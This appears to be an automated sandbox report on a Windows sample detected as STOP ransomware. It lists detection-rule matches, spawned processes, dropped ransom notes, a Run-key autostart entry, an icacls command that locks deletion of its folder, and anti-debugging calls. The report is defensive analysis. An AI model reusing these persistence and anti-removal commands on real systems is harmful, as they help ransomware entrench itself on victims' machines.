      Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 0000000C.00000000.442423722.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000002.00000000.374930864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 0000000C.00000000.441346091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 4004, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 5720, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 5592, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 4376, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 3616, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 5828, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 5832, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 3920, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 3304, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: Process Memory Space: bE5aaTiJM0.exe PID: 2888, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: String function: 0042F7C0 appears 37 times
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: String function: 0044F23E appears 44 times
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: String function: 00428520 appears 51 times
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: String function: 004547A0 appears 31 times
      Source: bE5aaTiJM0.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: bE5aaTiJM0.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: bE5aaTiJM0.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: bE5aaTiJM0.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: bE5aaTiJM0.exe Virustotal: Detection: 39%
      Source: bE5aaTiJM0.exe ReversingLabs: Detection: 53%
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe File read: C:\Users\user\Desktop\bE5aaTiJM0.exe
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe"
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe"
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask
      Source: unknown Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
      Source: unknown Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe File created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe
      Source: classification engine Classification label: mal100.rans.troj.evad.winEXE@18/215@6/2
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 0_2_041D07C6 CreateToolhelp32Snapshot,Module32First,0_2_041D07C6
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      Source: bE5aaTiJM0.exe String found in binary or memory: set-addPolicy
      Source: bE5aaTiJM0.exe String found in binary or memory: id-cmc-addExtensions
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: bE5aaTiJM0.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: bE5aaTiJM0.exe, bE5aaTiJM0.exe, 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 
00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp
      Source: Binary string: C:\xat\100\fahunisu_kuxuse\wuce97-sibemudex.pdb source: bE5aaTiJM0.exe, bE5aaTiJM0.exe.2.dr
      Source: Binary string: AC:\xat\100\fahunisu_kuxuse\wuce97-sibemudex.pdb` source: bE5aaTiJM0.exe, bE5aaTiJM0.exe.2.dr
      Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: bE5aaTiJM0.exe, 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 
00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 0_2_041D30AF push ecx; retf 0_2_041D30B2
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,2_2_00412220
      Source: initial sample Static PE information: section name: .text entropy: 7.947102009414188
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File created: C:\Users\user\Desktop\bE5aaTiJM0.exe.vvyu (copy)
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe File created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File created: C:\Users\user\Desktop\bE5aaTiJM0.exe
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File created: C:\_readme.txt
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe File created: C:\Users\user\_readme.txt
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe" /deny *S-1-1-0:(OI)(CI)(DE,DC)
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_2-31324
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bE5aaTiJM0.exe.vvyu (copy)
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Dropped PE file which has not been started: C:\Users\user\Desktop\bE5aaTiJM0.exe
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 0_2_041D171C rdtsc 0_2_041D171C
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe API call chain: ExitProcess graph end node graph_2-31326
      Source: bE5aaTiJM0.exe, 0000000B.00000003.435424110.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.436327985.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.618061651.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619380254.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448652959.000000000088C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: bE5aaTiJM0.exe, 0000000B.00000002.436250212.00000000007A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
      Source: bE5aaTiJM0.exe, 0000000B.00000003.435424110.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.436327985.00000000007FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWilter-0000
      Source: bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
      Source: bE5aaTiJM0.exe, 0000000C.00000002.619018447.0000000000848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpv
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_00424168 _memset,IsDebuggerPresent,2_2_00424168
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042A57A
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,2_2_00412220
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_00447CAC
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 0_2_041D171C rdtsc 0_2_041D171C
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 0_2_041D00A3 push dword ptr fs:[00000030h]0_2_041D00A3
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_004329EC
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_004329BB SetUnhandledExceptionFilter,2_2_004329BB

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Memory written: C:\Users\user\Desktop\bE5aaTiJM0.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Memory written: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe base: 400000 value starts with: 4D5A
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe"
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exe Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task
      Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
